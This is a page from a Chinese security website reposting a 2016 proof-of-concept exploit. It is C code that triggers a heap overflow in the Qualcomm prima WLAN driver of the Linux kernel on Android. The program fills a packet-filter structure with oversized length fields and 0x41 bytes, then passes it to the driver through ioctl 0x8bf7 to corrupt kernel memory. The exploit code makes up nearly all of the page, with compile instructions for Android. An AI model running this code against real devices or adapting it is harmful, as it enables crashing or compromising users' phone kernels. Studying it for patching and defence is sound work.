首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux Kernel - prima WLAN Driver Heap Overflow
来源:citypw@gmail.com 作者:R0ck 发布时间:2016-01-26  
/*
 * Coder: Shawn the R0ck, [citypw@gmail.com]
 * Co-worker: Pray3r, [pray3r.z@gmail.com]
 * Compile:
 * # arm-linux-androideabi-gcc wext_poc.c --sysroot=$SYS_ROOT  -pie
 * # ./a.out wlan0
 * Boom......shit happens[ as always];-)
*/
 
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/wireless.h>
#include <errno.h>
 
typedef unsigned char v_U8_t;
#define HDD_MAX_CMP_PER_PACKET_FILTER     5
 
struct PacketFilterParamsCfg {
    v_U8_t protocolLayer;
    v_U8_t cmpFlag;
    v_U8_t dataOffset;
    v_U8_t dataLength;
    v_U8_t compareData[8];
    v_U8_t dataMask[8];
};
 
typedef struct {
    v_U8_t filterAction;
    v_U8_t filterId;
    v_U8_t numParams;
    struct PacketFilterParamsCfg
        paramsData[HDD_MAX_CMP_PER_PACKET_FILTER];
} tPacketFilterCfg, *tpPacketFilterCfg;
 
int main(int argc, const char *argv[])
{
    if (argc != 2) {
        fprintf(stderr, "Bad usage\n");
        fprintf(stderr, "Usage: %s ifname\n", argv[0]);
        return -1;
    }
 
    struct iwreq req;
    strcpy(req.ifr_ifrn.ifrn_name, argv[1]);
    int fd, status, i = 0;
    fd = socket(AF_INET, SOCK_DGRAM, 0);
    tPacketFilterCfg p_req;
 
    /* crafting a data structure to triggering the code path */
    req.u.data.pointer =
        malloc(sizeof(v_U8_t) * 3 +
           sizeof(struct PacketFilterParamsCfg) * 5);
    p_req.filterAction = 1;
    p_req.filterId = 0;
    p_req.numParams = 3;
    for (; i < 5; i++) {
        p_req.paramsData[i].dataLength = 241;
        memset(&p_req.paramsData[i].compareData, 0x41, 16);
    }
 
    memcpy(req.u.data.pointer, &p_req,
           sizeof(v_U8_t) * 3 +
           sizeof(struct PacketFilterParamsCfg) * 5);
 
    if (ioctl(fd, 0x8bf7, &req) == -1) {
        fprintf(stderr, "Failed ioct() get on interface %s: %s\n",
            argv[1], strerror(errno));
    } else {
        printf("You shouldn't see this msg...\n");
    }
 
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Buffalo NAS Remote Shutdown
·Glassfish Server - Arbitrary F
·FreeBSD SCTP ICMPv6 Error Proc
·CesarFTP 0.99g - XCWD Denial o
·Android ADB Debug Server Remot
·Android sensord Local Root Exp
·OS X Kernel - Hypervisor Drive
·xWPE 1.5.30a-2.1 - Local Buffe
·OS X - IOSCSIPeripheralDeviceT
·Java Platform SE 6 U24 HtmlCon
·OS X and iOS Unsandboxable Ker
·BlueControl 3.5 SR5 Insecure L
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved